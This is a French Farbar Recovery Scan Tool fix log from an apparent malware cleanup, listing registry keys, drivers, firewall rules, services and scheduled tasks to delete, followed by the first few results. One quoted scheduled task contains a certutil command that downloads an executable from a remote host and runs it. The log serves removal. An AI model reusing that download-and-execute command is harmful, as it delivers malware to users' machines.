Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 13-07-2019
Exécuté par nathan (13-07-2019 17:46:57) Run:6
Exécuté depuis C:\Users\nathan\Desktop
Profils chargés: nathan (Profils disponibles: nathan)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1
DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\Advanced SystemCare
DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\ASC
DeleteKey: HKLM\SOFTWARE\Wow6432Node\IObit\Driver Booster
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\000
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\001
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\002
C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\Plugins
unlock: C:\Windows\system32\drivers\8f00b204e9800998.sys
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998
C:\Windows\system32\drivers\8f00b204e9800998.sys
C:\Windows\windefender.exe
DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet
DeleteKey: HKCU\SOFTWARE\EpicNet Inc.
DeleteKey: HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\EpicNet Inc.
C:\Users\nathan\AppData\Roaming\EpicNet Inc
unlock: C:\Windows\System32\drivers\Winmon.sys
C:\Windows\System32\drivers\Winmon.sys
unlock: C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\WinmonFS.sys
unlock: C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Users\nathan\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{5BFEE7E8-5955-4B8A-BDD7-73E0EEC2F421}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{8CD74997-ACC6-45C8-B107-46E4F6D751A3}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{6328ED04-3C49-48CD-B0BD-4126217142C8}
DeleteValue: HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{CEE6325F-CD04-472A-A536-FFF245610E26}
Task: {0477D444-D9D4-43CB-BA0E-DDCB5A844393} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://foxmusic.xyz/app/app.exe C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\nathan\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {4107081B-99FB-4116-93B9-4D7DD56713CD} - \{248E71BD-FD6D-46BF-889A-874915A90435} -> Pas de fichier
Task: {DFB0A61A-AD16-40DE-864E-89AE6D3C641F} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe
CHR HomePage: Default -> hxxp://www.funnysearching.com/
S2 yzrnpmcu; C:\Windows\SysWOW64\yzrnpmcu\jhokjsqh.exe [X]
S4 IUFileFilter; pas de ImagePath
U3 MBAMService; pas de ImagePath
2019-07-05 11:46 - 2019-07-07 11:49 - 000000000 ___HD C:\qtoie9GGJ2DkZWhu
2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnigmaSoft
2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\ProgramData\EnigmaSoft Limited
2019-07-03 11:21 - 2019-07-03 11:21 - 000000000 ____D C:\Program Files\EnigmaSoft
2019-06-29 11:15 - 2019-07-05 11:40 - 000000000 ____D C:\Windows\SysWOW64\yzrnpmcu
2019-07-05 11:40 C:\Windows\SysWOW64\yzrnpmcu
AlternateDataStreams: C:\Users\nathan\AppData\Local\Temp:$DATA [16]
EmptyTemp:
*****************

Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1 => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\IObit\Advanced SystemCare => supprimé(es) avec succès
HKLM\SOFTWARE\Wow6432Node\IObit\ASC => non trouvé(e)
HKLM\SOFTWARE\Wow6432Node\IObit\Driver Booster => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\000" => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\001" => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\002" => non trouvé(e)
"C:\Users\nathan\AppData\Local\Google\Chrome\User Data\Default\File System\Plugins" => non trouvé(e)
"C:\Windows\system32\drivers\8f00b204e9800998.sys" => a été déverrouillé
HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998 => impossible à supprimer, clé était peut-être protégé(e)